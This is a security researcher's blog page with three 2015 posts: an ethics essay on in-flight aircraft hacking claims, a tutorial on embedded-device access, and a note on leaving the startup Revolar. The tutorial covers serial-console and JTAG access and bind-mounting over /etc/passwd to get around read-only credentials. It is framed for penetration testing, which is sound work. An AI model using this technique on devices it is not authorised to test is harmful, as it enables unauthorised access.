Friday, May 15, 2015

No More Free Thoughts - The Cost of Professionalism

"I'm Flying High Over Tupelo, Mississippi With America's Hottest Hacker, and We're All About To Die"

There are a lot of things Denver is known for being high on, mostly altitude. But, lately, it isn’t just the sticky green political battle that has been gaining attention, it’s the high-altitude antics of our local information security enthusiast Chris Roberts. But, like most highs, and hacked aviation systems, this story is bound to plummet into the lifeless, high-desert plains. Why? News agencies are reporting that Chris Roberts, as a passenger, took control of an airplane mid flight by hacking the plane’s entertainment system, and was able to briefly redirect the flight’s course.

The fact is that the information security industry, the department of defense, the aviation industry, and other agencies, have known that this is possible for years. The capability itself is not news, and even if information security analysts want to presume they are the first to uncover a hole such as this, they aren’t. Embedded systems engineers, especially ones managing and building critical systems, are aware of these risks, and are continually working towards cost effective measures to combat these risks. After researching Internet of Things technology and embedded systems for over a decade, I came to realize that most engineering teams do understand their risks, but they are limited by budgetary constraints, talent, corporate politics, and time.

So, if the people that can affect real change in a risky technology generally know about the risk models, who is the real benefactor of a dramatic act such as redirecting the course of a plane? To take control of a plane mid-flight, and potentially perform an action against the best judgment of the humans in control of the cockpit, against the flight management system that constantly evaluates sensors and statistical models far faster than a human is able to react, is a benefit to no one. Dramatizing the potential for loss of human life is a benefit to no one. No one wins by creating fear, uncertainty, and doubt. So why do it?

Halcyon Days

Over the past several years, the information security industry has exploded from a small group of loose-knit hackers who all knew each other, to an industry of millions of wannabe professionals vying for a speaker slot at the world renowned Black Hat Briefings, DEFCON, or Hack In The Box security conferences. Our little universe has suddenly become saturated by newcomers that want to make a name for themselves, and stake a claim on the high salaries that come with notoriety. But, we’re also at a critical juncture in the technological advancement of the Internet, embedded systems, and accessibility.

The Internet of Things movement eschews the common perception of the Internet as a hidden highway of bits and bytes flowing through ethereal tubes, somehow disparate from the physical reality in which we all live. Instead, the Internet of Things and modern embedded systems creates a conglomeration of the human experience and the digital highway; fusing together the somatic human experience with intangible algorithmic expressions. The binding of these two universes means that, for the first time in human history, actions in an abstract virtual environment have a perceivable, tangible effect on the physical world. In other words, our thoughts now have consequences. Real consequences. And because of this, there are No More Free Thoughts. There is, instead, a quantifiable cost to everything we do as information security professionals.

When I performed the first remote hack of a vehicle security system in 2011 at Black Hat Briefings Las Vegas, I wasn’t aware of the real significance of what I had accomplished. To me, it was as simple as taking a small piece of technology and understanding its risks, and abusing its weaknesses, to achieve a goal that the device wasn’t meant to achieve. I knew that I had proven there was a new set of risks to users of IoT technology, but I wasn’t conscious of how entwined our lives would become in this next iteration of the Internet, nor did I realize how quickly IoT would explode into every aspect of our lives. It became obvious very quickly that we, as a society, were evolving far faster than we intended, as we turned the Internet into the Internet of Us; the human-digital existential experience. And, as we all know, innovation far outpaces sound security practices.  

Another early researcher into IoT technology, Barnaby Jack, proved that there was a direct risk to humans with his research into pacemaker hacking, automated saline drip systems, and even Automated Teller Machine (ATM) attacks. For about a year we happened to live in the same apartment building in San Francisco. One afternoon, months before he was scheduled to give a speech on pacemaker hacking at Black Hat, I ran into him in the elevator.

“What do you think is going to happen with this new era of embedded risks? Any predictions?”, I asked.

“I don’t know, but it’s not going to be pretty.”

Industry of Cool

I’ll never forget how forlorn Barnes looked, realizing that our actions now meant human lives were hanging in the balance of information security professionals. It’s a scary thought, that the right hacker could save hundreds of thousands of lives, or harm them. It’s a scary thought that Andrew Auernheimer was sent to prison for far less than probing critical medical systems. It’s a scary thought that Aaron Schwartz was persecuted, and subsequently committed suicide, for simply downloading documents. It’s a scary thought that Stephen Watt was imprisoned for years for writing a computer program. It’s a scary thought that engineers are developing the next iteration of the Internet with no requirements from the government, or engineering organizations, to adhere to safety and security standards. It’s a scary thought that some of our own information security scene members would risk the lives of people on their own plane just to prove a point, far exceeding the legal sins of Andrew, Aaron, and Stephen.

As we traverse through this brave new world of technology and an industry saturated by newcomers throwing `bows for attention and viability, we can’t allow our ranks to disintegrate into some Industry of Cool, where we only care about what will grab people’s attention. We now have to consider the end-user’s physical safety, and adhere to ethics that ensure the consumer is considered far before any headline grabbing desires. Risking the lives of the people we are supposedly trying to save is not just unethical, it’s abhorrent. We need to mature our industry beyond its infantile rock star thought models, and build a foundation of trust between our ranks, systems engineers, business owners, and especially consumers. Now, more than ever, consumers need us to speak on their behalf, not put them at risk.

Every topic we research, everything we hack, every joke we make on Twitter, now, more than ever, has a quantifiable cost. Think the next time you make a statement that could put those around you at tangible risk. Because now, in this brave new world of self-driving cars, WiFi-enabled pacemakers, and bionic limbs, there absolutely are No More Free Thoughts.

Founder
Lab Mouse Security
https://www.securitymouse.com/

Friday, May 8, 2015

Micky Mouse Hacks: Password Cracking is A Waste of Energy

Get Disney On `Em

In the past year or so I've noticed a growing number of people stumbling on the same issues when getting into embedded systems design and hacking. It's odd how very few blogs are focusing on solutions to these very common problems. So, when I have a chance, I'm going to drop some tips and tricks here and there to help people out. 

I'd like to pretend that these are difficult tricks, and my ego is my cross to bear ;-), but the reality is these are simple ways of dealing with annoying hindrances in performing viable engagements with clients. There is no reason for someone to spend money paying for an engineer or auditor to perform work that can be sidestepped in less than a minute. So, the solutions I'll present in the "Mickey Mouse Hacks" blogs will serve to illuminate quick-and-dirty ways to minimize the time it takes to get to real work. 

It's easy to get distracted by shiny things. Don't. 

But, like I said, these solutions are largely easy breezy, and to anyone that spends more time engineering than hacking, should already be in your general tool belt. It seems that, from the forum posts, and blog posts I'm seeing asking the same questions over and over, that people do indeed have these tools, they just forget about them as they aren't often used by adversarial researchers. 

Consoles, TTYs, and JTAG, Oh my!

Just like the cheesy Disney songs we hear people relentlessly singing in public (yes, Dads, I can tell that's a Frozen tune you're trying not to hum) embedded systems are pretty consistent. In other words, whether engineers intend to or not, they all pretty much sound the same. I know that's hard for some of us to admit, but when boxes are developed with almost the exact same components, competing for the exact same market, at very similar price points, of course the end products look bizarrely similar! 

"But, Don! What about intellectual property!?" 

You're hilarious!
This is purely a matter of Darwinism. Systems designed for the same environment eventually collapse into the same model. Period. As a result, they usually have the same technologies: Busybox, ARM, Ethernet, bla bla bla. And what's the number one way to visually assess what is going on within an embedded system? A serial console! 

Generally, there are three primary goals for a reverse engineer: serial consoles, remote TTY sessions (telnet, ssh, etc), and JTAG; not necessarily in this order. 

The easiest target is always the serial console, followed by JTAG. Serial console ports are often TTL pins, and in most modern systems you can at least find a header already attached to the Printed Circuit Board (PCB) you're evaluating. Even if you can't find one, chances are you can discover one quickly by looking for four pins and evaluating those pins with a multimeter. The Voltage levels will dictate whether it is likely to be a standard console. 

Alternatively, one can simply obtain the datasheet for the chip being used, and identify which pins are likely to be the UART, then use a multimeter, and maybe some hypodermic needles to tap vias, to identify whether a port has been found. 

Regardless of the method, this is usually a small amount of effort at the beginning of any embedded engagement. 

However, there is one big restriction. Serial consoles aren't great for long term work. Typically, when assessing an embedded system, the work will primarily be done on a separate box. For most engineers, this means that remotely accessing the target box is highly desirable. But, it isn't enough to simply set up an instance of netcat, or another tool, because engineers typically want the console characteristics that come with Telnet, SSH, and similar protocols. Terminal capabilities were designed for a reason. 

As a result, people as of late love to pull out Ye Old John The Ripper and crack that read-only password file. Boring! 

JTR In Modern Embedded Systems is This Useful

Use the Serial Console Efficiently 

Since we know a serial console is almost always accessible, and we can almost always get shell access with it, we don't need to crack any passwords. Why? Two reasons. 

First, if you have console access and JTAG ability, you should never need console login credentials in the first place. You should always be able to interrupt a booting kernel and change RAM contents to ensure that the kernel boots into a mode (such as single user mode) that allows you to manipulate credentials, or boot into a mode where a console is enabled. 

This means that we should always at least have writable root access to the serial console, which brings us to point number two: you should never need to crack a password to log in remotely if you have a local shell. 

Bro, I'm seriously. 
There is an easy reason for this, and it's called the modern Linux kernel. Modern kernels are capable of union (or bind) mounts. This namespace capability allows the kernel to mount files and directories on top of other files and directories. Not familiar with namespaces, unions, or bind mounts? They're actually a feature of the Plan 9 Operating System that was integrated into Linux, along with procfs, and some other excellent Plan 9 concepts. 

Point being, applications ran on the Linux system will use whatever file is at the name /etc/passwd. Remember, in namespace environments, this file system path is only a token. It doesn't necessarily reference an exact file, only the concept of a file. Because of this, you can abuse the namespace capabilities of the Linux kernel to place whatever file you want on top of this name, even in a read-only environment

Read-Only Is For Suckers

This means that if your system performs a cryptographic check on the contents of root '/' or '/etc', and mounts the NVRAM partition read-only, you still win easily with one command:

`mount -o bind` wins every time!
Guess what? You just saved yourself a ton of time and energy cracking a password that doesn't matter. The other benefit? You can now add and remove users at will, and re-add the state to the system on the next boot with a single command. 

Now, you can log in remotely with no effort at all because the telnetd application doesn't maintain a persistent file descriptor on the original '/etc/passwd' file. Instead, it will only open the file when it needs it, after you have applied the namespace adjustment. This means that telnetd, sshd, or any other system that deals with user credentials will interpret the data you want it to instead of the data the system engineer wants it to

Aaaand, we're done. 
Some people might complain at this point that this trick must be applied at every reboot, and that because it must be performed every time, it is "easier" to simply crack the password. 

Yes and no. Yes, it would be nice to have the password. But, the amount of electricity it requires to crack a password in a reasonable time that isn't simply "root", "12345", or something else guessable, is not worth it. Since any decent engineer will always have at least minicom hooked up to a serial console, you can simply develop a minicom script that will automate the injection of commands when certain "phrases" are seen. This can allow minicom to detect a reboot and wait for an appropriate time to send the given commands. 

Since the trick here is one single command that needs repeating, the mount command, there really isn't a lot of overhead. I'd much rather do this than bother with the energy costs of using a GPU cluster, a fast server, or - God forbid - a cloud based password cracking utility. 

Your data lives here.
As always, keep on hackin'! 

Don A. Bailey
Founder
Lab Mouse Security


Monday, April 20, 2015

Cloudless Skies: On Leaving Team Revolar

On Wednesday, April 15th, I officially left the Revolar team. Though the execution of my decision was swift, I had been contemplating it for several weeks, but, not for the usual reasons you might find on a "I was part of a start up" blog. There was no animosity, or even frustration, involved in the decision. Rather, it was a growing realization that the paths that Jacqueline and I had envisioned for the company were growing more and more disparate. In this case, however, that is not a bad thing. In fact, I think it will benefit both of us substantially.

As most of my friends and peers know, I was one of the first information security researchers to dive into the Internet of Things (IoT) space seven years ago. I've been blessed to be a part of ground breaking research focused on both attacking and defending IoT for that period of time. My experience in the embedded systems engineering space extends even further to the early 2000's, when, for a brief period, I focused on firmware reverse engineering and attacking IEEE1275 systems on SPARC and Mac platforms.

As a result of these experiences, I wanted to build technology that could solve the issues I kept seeing over and over in consumer technology. While industrial environments are equally as plagued by security risks, it is the consumer space where we are going to see risks grow from "Ack, someone stole my credit card number" to "Can we trust our car not to veer off a cliff?" (Hi Charlie and Chris). This dramatic shift in the capability of digital systems still has yet to be addressed in any viable shape or form. While we are seeing standards initiatives being launched in the IoT and Machine to Machine (M2M) spaces, it will take a significant amount of time for new (and existing) companies to adopt or adhere to these standards.

That, for me, is where Revolar came into play. I saw the Revolar personal safety device as an exceptional example of a device that required a whole new level of information security integration. Jacqueline, being an intelligent and adaptable entrepreneur, immediately saw the viability of a partnership between us. Jackie and her team would define the business practice for the Minimum Viable Product (MVP), the personal safety device, and I would re-design the technology on which it should be built, and integrate my existing Internet of Things security platform as a way of addressing potential security risks, while creating viable licensing opportunities. It seemed like a perfect fit.

Over time, however, we found that our vision for the organization evolved in different directions. While I was more interested in creating a research and development product team, Jackie became more interested in developing within the personal safety space. While these things are not entirely separate from each other, the underlying logistics and strategies for the business models deviate substantially. I started to realize I was pulling her in a direction that was distracting her from her original goal: simply helping people with straight-forward technology.

Thus, after a few discussions with my lawyer team, and a few more calls with the exceptional members of the Lab Mouse Security board of advisers, it made sense that if we were growing two separate trees in one ceramic pot, either the pot would shatter, or one tree should be replanted. I chose to preemptively plant myself back in the Lab Mouse pot.

For transparency, however, I will openly admit that I left the organization without asking for equity or a return on my time. There are several very important reasons for this. First and foremost, I did not want to take capital away from the team when they are in a critical juncture financially. As most of my peers know, my hourly consulting rate is a fair one, but our industry as a whole is expensive. If I were to forego equity and ask for a return on my time as a consultant, it would take a significant toll on the Revolar team in the middle of a critical round of funding.

Secondly, I refused to push for equity as a return on my time because of the implication of holding stock in an organization that I have no influence in. Since I will not be developing the Revolar technology, cloud infrastructure, or communications protocol, I cannot in good conscience profit from a consumer offering whose security model I have not been able to audit or design. That said, I know the Revolar team is exceptionally talented, intelligent, and resourceful, and will do everything in their power to release a product that addresses consumer safety effectively.

Overall, I have to say that this was one of my most favorite business experiences. I learned an exceptional amount from the Revolar team in these months, and I am proud to have been a part of their growth, even for a small period of time. I wish them nothing but the best, and hope to see them all succeed in their goal of bringing safety technology to the consumer market in the near future.

Best wishes for a brilliant flight,

Don A. Bailey
Founder
Lab Mouse Security
https://www.securitymouse.com/
@InfoSecMouse